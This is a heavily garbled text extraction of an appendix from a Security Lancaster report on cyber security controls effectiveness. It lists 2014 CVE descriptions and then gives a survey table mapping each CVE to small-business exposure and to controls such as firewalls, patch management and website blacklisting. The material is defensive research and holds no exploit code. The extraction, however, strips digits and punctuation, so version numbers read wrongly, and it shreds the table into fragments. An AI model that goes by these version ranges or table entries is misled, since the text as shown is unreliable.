CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
